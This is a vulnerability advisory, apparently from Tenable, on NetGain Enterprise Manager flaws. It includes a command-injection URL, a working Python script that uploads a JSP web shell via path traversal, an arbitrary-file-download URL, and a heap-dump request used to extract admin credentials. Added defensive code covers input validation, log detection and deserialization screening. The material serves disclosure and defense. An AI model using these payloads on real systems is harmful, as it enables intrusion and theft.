While researching a command injection vulnerability published on Exploit Database, Tenable found multiple remote vulnerabilities in NetGain Enterprise Manager.
CVE-2017-16608: Incomplete Command Injection Patch
NetGain tried to patch the Exploit-DB command injection vulnerability in 7.2.586 build 877. The patch attempted to block the command injection by adding the following checks:
- The argument parameter must be a valid IP address
- The command must start with "cmd /c ping" or "ping -c 5"
The obvious problem is that the second check only looks at how the command starts, so an attacker can append additional text after the required command prefix. For instance, an attacker could make a new directory by using the command argument "cmd /c ping || mkdir C:\Users\Public\fun ||". The following URL is a complete example:
http://[target]:8081/u/jsp/tools/exec.jsp?command=cmd%20%2Fc%20ping%20%7C%7C%20mkdir%20C%3A%5CUsers%5CPublic%5Cfun%20%7C%7C&argument=127.0.0.1&async_output=nessus_56043399
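As an added illustration (not NetGain's code, which the advisory does not reproduce), the following Python models the two checks described above and, beside them, a stricter variant: the command must equal an allowed entry exactly, the argument must parse as an IP address, and the result is an argument list handed to the OS without a shell, so nothing appended after the prefix is ever interpreted. The function names and the run_ping helper are this example's own.

```python
import ipaddress
import subprocess

# The two command prefixes the 7.2.586 build 877 patch accepts, per the advisory.
ALLOWED_COMMANDS = ("cmd /c ping", "ping -c 5")


def patched_check(command, argument):
    """Model of the patch's logic as the advisory describes it: the argument must parse
    as an IP address and the command only has to *start with* an allowed prefix."""
    try:
        ipaddress.ip_address(argument)
    except ValueError:
        return False
    return command.startswith(ALLOWED_COMMANDS)


def strict_argv(command, argument):
    """Hardened variant (this example's own, not NetGain's code): the command must equal
    an allowed entry exactly, the argument must be an IP address, and the result is an
    argument list so nothing after the prefix can reach a shell. Returns None on reject."""
    try:
        ipaddress.ip_address(argument)
    except ValueError:
        return None
    if command not in ALLOWED_COMMANDS:
        return None
    return command.split() + [argument]


def run_ping(command, argument, timeout=15):
    """Execute the validated argv without a shell; raises ValueError on rejected input."""
    argv = strict_argv(command, argument)
    if argv is None:
        raise ValueError("rejected command or argument")
    # shell=False is the default: the list is passed straight to the OS, no shell parsing.
    return subprocess.run(argv, capture_output=True, text=True, timeout=timeout)


if __name__ == "__main__":
    bypass = "cmd /c ping || mkdir C:\\Users\\Public\\fun ||"   # the advisory's example
    print("patched check accepts bypass:", patched_check(bypass, "127.0.0.1"))
    print("strict check accepts bypass:", strict_argv(bypass, "127.0.0.1") is not None)
    print("strict argv for a legitimate call:", strict_argv("ping -c 5", "127.0.0.1"))
```

The point of the strict variant is not a better denylist of shell characters: the command string is compared for equality against a fixed table, and the only variable part (the IP address) becomes a single argv element, so the shell that made "||" meaningful is never involved.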
CVE-2017-16610: Unauthenticated JSP Upload and Execution
An unauthenticated remote attacker can upload arbitrary files to the remote server via an HTTP POST request to /u/jsp/backup/upload_save_do.jsp. This is particularly useful because NetGain EM has write access to the web root, which means that an attacker can upload a JSP web shell. The following proof of concept uploads a web shell to the JavaScript directory (/u/js/).
import requests
import sys
from requests_toolbelt.multipart.encoder import MultipartEncoder

if len(sys.argv) != 3:
    print('Usage: ./nsg_backup_upload.py <server_address> <port>')
    print('Example: python ./nsg_backup_upload.py 192.168.1.38 8081')
    sys.exit(0)

# Minimal JSP web shell: runs the "cmd" query parameter and echoes its output.
jsp_shell = (
    '<%@ page import="java.util.*,java.io.*"%>\n'
    '<html><body>'
    '<form method="GET" name="myform" action="">\n'
    '<input type="text" name="cmd">\n'
    '<input type="submit" value="Send">\n'
    '</form>\n'
    '<pre>\n'
    '<%\n'
    'if (request.getParameter("cmd") != null) {\n'
    'out.println("Command: " + request.getParameter("cmd") + "<br>");\n'
    'Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));\n'
    'OutputStream os = p.getOutputStream();\n'
    'InputStream in = p.getInputStream();\n'
    'DataInputStream dis = new DataInputStream(in);\n'
    'String disr = dis.readLine();\n'
    'while ( disr != null ) {\n'
    'out.println(disr);\n'
    'disr = dis.readLine();\n'
    '}\n'
    '}\n'
    '%>\n'
    '</pre></body></html>')

# The file name carries a traversal sequence, so the upload lands in the
# web-served /u/js/ directory instead of the backup directory.
multipart_data = MultipartEncoder(
    fields={
        'file': ('../u/js/shell.jsp', jsp_shell, 'text/plain')
    })

response = requests.post(
    'http://' + sys.argv[1] + ':' + sys.argv[2] + '/u/jsp/backup/upload_save_do.jsp',
    data=multipart_data,
    headers={'Content-Type': multipart_data.content_type})
print(response.status_code)
CVE-2017-16609: Unauthenticated File Download
An unauthenticated remote attacker can download any file on the remote server via an HTTP GET (or POST) request. The following URL will download C:\Windows\win.ini:
http://[target]:8081/u/jsp/common/download.jsp?filename=win.ini&srcDir=C:\Windows
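Both the upload issue (CVE-2017-16610) and the download issue (CVE-2017-16609) come from letting the caller steer the file system path: a traversal sequence in the multipart file name in one case, a caller-supplied srcDir in the other. The added Python below is this page's own example, not NetGain's code; the directory names are assumptions. It shows the check a hardened handler would apply to both endpoints: accept only a bare file name, resolve it under a fixed directory, and for uploads refuse extensions the web container would execute.

```python
import os

# Fixed directories the hardened handlers serve from (assumed names; NetGain's
# real layout is not shown in the advisory).
UPLOAD_DIR = "/opt/netgain/backup"
DOWNLOAD_DIR = "/opt/netgain/export"
# Extensions a servlet container would execute if they landed under the web root.
EXECUTABLE_EXT = {".jsp", ".jspx", ".jsw", ".jsv", ".jspf"}


def safe_join(base_dir, user_name):
    """Join user_name onto base_dir only if it is a bare file name.

    Returns the absolute target path, or None when the name carries a directory
    separator, a drive letter, a NUL byte or a traversal element, or when the
    resolved path does not sit directly inside base_dir.
    """
    if not user_name or user_name in (".", ".."):
        return None
    if any(ch in user_name for ch in ("/", "\\", "\x00", ":")):
        return None
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, user_name))
    # Belt and braces: even a name that passed the filter must resolve to base/<name>.
    if os.path.dirname(target) != base or os.path.basename(target) != user_name:
        return None
    return target


def upload_path(user_name):
    """Destination for an uploaded backup; refuses names the container would execute."""
    target = safe_join(UPLOAD_DIR, user_name)
    if target is None:
        return None
    if os.path.splitext(user_name)[1].lower() in EXECUTABLE_EXT:
        return None
    return target


def download_path(user_name):
    """Source for a download. There is deliberately no srcDir parameter: the
    directory is fixed server-side and only the file name comes from the request."""
    return safe_join(DOWNLOAD_DIR, user_name)


if __name__ == "__main__":
    for name in ("../u/js/shell.jsp", "shell.jsp", "backup_2017_03_07.zip"):
        print("upload  ", repr(name), "->", upload_path(name))
    for name in ("win.ini", "..\\Windows\\win.ini", "C:\\Windows\\win.ini"):
        print("download", repr(name), "->", download_path(name))
```

The extension check matters even with the path check in place: NetGain EM writes inside the web root, so a .jsp that stays within the intended directory is still executable if that directory is served.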
CVE-2017-16607: Unauthenticated Information Disclosure
NetGain EM allows an unauthenticated remote attacker to download all of the process's heap memory using the following URL:
http://[target]:8081/u/jsp/settings/heapdumps.jsp?dumpnow=1
The attacker can then search the memory for interesting information such as credentials. For example, Tenable found the admin username and password in a dump using the following method:
albinolobster@ubuntu:~$ strings ./heapdump_2017_03_07_15_48_34.bin | grep username=
username=admin&password=thisismypassword%21
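All four HTTP issues above leave a trace in an access log. The following added Python (not part of the advisory) applies the request paths named on this page to a handful of constructed log lines in common log format; the log lines, client addresses and timestamps are made up for the example, and the front-end proxy that would produce such a log is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request paths named in the advisory, mapped to the CVE each one belongs to.
WATCHED = {
    "/u/jsp/tools/exec.jsp": "CVE-2017-16608",
    "/u/jsp/backup/upload_save_do.jsp": "CVE-2017-16610",
    "/u/jsp/common/download.jsp": "CVE-2017-16609",
    "/u/jsp/settings/heapdumps.jsp": "CVE-2017-16607",
}
# Operators that let text appended after "cmd /c ping" run a second command.
SHELL_OPERATORS = re.compile(r"\|\||&&|[|&;`]")
# Common log format: client ident user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def classify(line):
    """Return (cve, client, reason) for a request matching one of the advisory's
    issues, or None for a line that is unparseable or not interesting."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    cve = WATCHED.get(parts.path)
    if cve is None:
        return None
    # parse_qs percent-decodes, so "%7C%7C" in the raw log becomes "||" here.
    q = {k: v[0] for k, v in parse_qs(parts.query).items()}
    reason = None
    if cve == "CVE-2017-16608" and SHELL_OPERATORS.search(q.get("command", "")):
        reason = "shell operator appended to ping command"
    elif cve == "CVE-2017-16609" and ("srcDir" in q or ".." in q.get("filename", "")):
        reason = "caller-controlled directory in download request"
    elif cve == "CVE-2017-16607" and q.get("dumpnow") == "1":
        reason = "heap dump requested"
    elif cve == "CVE-2017-16610" and m.group("method") == "POST":
        reason = "backup upload endpoint reached"
    if reason is None:
        return None
    return (cve, m.group("client"), reason)


def scan(lines):
    """Run classify over an iterable of log lines and keep the hits."""
    return [hit for hit in (classify(line) for line in lines) if hit]


# Constructed sample log; the first four requests mirror the URLs in the advisory.
SAMPLE_LOG = [
    '203.0.113.9 - - [07/Mar/2017:15:48:01 +0000] "GET /u/jsp/tools/exec.jsp?command=cmd%20%2Fc%20ping%20%7C%7C%20mkdir%20C%3A%5CUsers%5CPublic%5Cfun%20%7C%7C&argument=127.0.0.1&async_output=nessus_56043399 HTTP/1.1" 200 512',
    '203.0.113.9 - - [07/Mar/2017:15:48:02 +0000] "POST /u/jsp/backup/upload_save_do.jsp HTTP/1.1" 200 88',
    '203.0.113.9 - - [07/Mar/2017:15:48:03 +0000] "GET /u/jsp/common/download.jsp?filename=win.ini&srcDir=C:\\Windows HTTP/1.1" 200 403',
    '203.0.113.9 - - [07/Mar/2017:15:48:04 +0000] "GET /u/jsp/settings/heapdumps.jsp?dumpnow=1 HTTP/1.1" 200 1048576',
    '198.51.100.4 - - [07/Mar/2017:15:49:00 +0000] "GET /u/jsp/tools/exec.jsp?command=cmd%20%2Fc%20ping&argument=10.0.0.5 HTTP/1.1" 200 200',
    '198.51.100.4 - - [07/Mar/2017:15:49:10 +0000] "GET /u/css/main.css HTTP/1.1" 200 3100',
]

if __name__ == "__main__":
    for cve, client, reason in scan(SAMPLE_LOG):
        print(cve, client, reason)
```

Matching on the decoded query string rather than the raw one is what keeps the exec.jsp rule honest: the advisory's URL encodes "||" as "%7C%7C", and a pattern applied before decoding would miss it.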
CVE-2017-17406: Unsafe Java Object Deserialization
NetGain EM exposes two Java RMI registries, on ports 1800 and 1850. NetGain also ships several Java libraries that are known to be useful in Java deserialization attacks, including bsh, Apache Commons Collections, and Apache Commons FileUpload. Tenable confirmed that an unauthenticated remote attacker could achieve remote code execution using a deserialization attack over RMI.
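A defender who captures the traffic to those RMI ports can at least tell whether a serialized stream names classes from the libraries listed above. The added Python below is this page's own example, not NetGain's or Tenable's code: it is a grep-style extractor, not a full Java serialization parser (it does not track back-references or proxy class descriptors), and the sample stream it checks is constructed for the example. The sensor that would hand it a payload is an assumption.

```python
import re

# Java ObjectOutputStream header: STREAM_MAGIC (0xACED) and STREAM_VERSION (5).
STREAM_MAGIC = b"\xac\xed\x00\x05"
# TC_CLASSDESC (0x72) is followed by a 2-byte length and the class name in modified UTF-8.
# Heuristic: a 0x72 byte, a length below 512, then at least that many identifier bytes.
CLASSDESC_RE = re.compile(rb"\x72(?P<len>[\x00-\x01][\x00-\xff])(?P<name>[A-Za-z0-9_.$\[;]{1,511})")
# Package prefixes of the libraries the advisory lists as gadget sources.
GADGET_PREFIXES = ("org.apache.commons.collections", "org.apache.commons.fileupload", "bsh.")


def class_names(blob):
    """Heuristically list every class name declared in a Java serialization stream
    found inside blob. Returns [] when no stream header is present."""
    start = blob.find(STREAM_MAGIC)
    if start < 0:
        return []
    names = []
    for m in CLASSDESC_RE.finditer(blob, start):
        length = int.from_bytes(m.group("len"), "big")
        candidate = m.group("name")
        # The declared length must fit inside the run of identifier bytes we matched.
        if 0 < length <= len(candidate):
            names.append(candidate[:length].decode("ascii"))
    return names


def gadget_classes(blob):
    """Class names from class_names() that belong to one of the flagged packages."""
    return [n for n in class_names(blob) if n.startswith(GADGET_PREFIXES)]


def make_sample_stream(names):
    """Constructed test input: one field-less object per class name in a single stream."""
    out = bytearray(STREAM_MAGIC)
    for name in names:
        raw = name.encode("ascii")
        out += b"\x73\x72" + len(raw).to_bytes(2, "big") + raw  # TC_OBJECT, TC_CLASSDESC, className
        out += b"\x00" * 8                                       # serialVersionUID (arbitrary here)
        out += b"\x02\x00\x00"                                   # flags SC_SERIALIZABLE, zero fields
        out += b"\x78\x70"                                       # TC_ENDBLOCKDATA, TC_NULL superclass
    return bytes(out)


if __name__ == "__main__":
    sample = make_sample_stream(["java.util.HashMap", "org.apache.commons.collections.Transformer"])
    print("classes:", class_names(sample))
    print("flagged:", gadget_classes(sample))
```

On the application side the equivalent control is an ObjectInputFilter (JEP 290, in Java 9 and backported to 8u121), which lets the RMI registry reject class names before they are instantiated; the sensor-side check above only tells you that such a stream arrived.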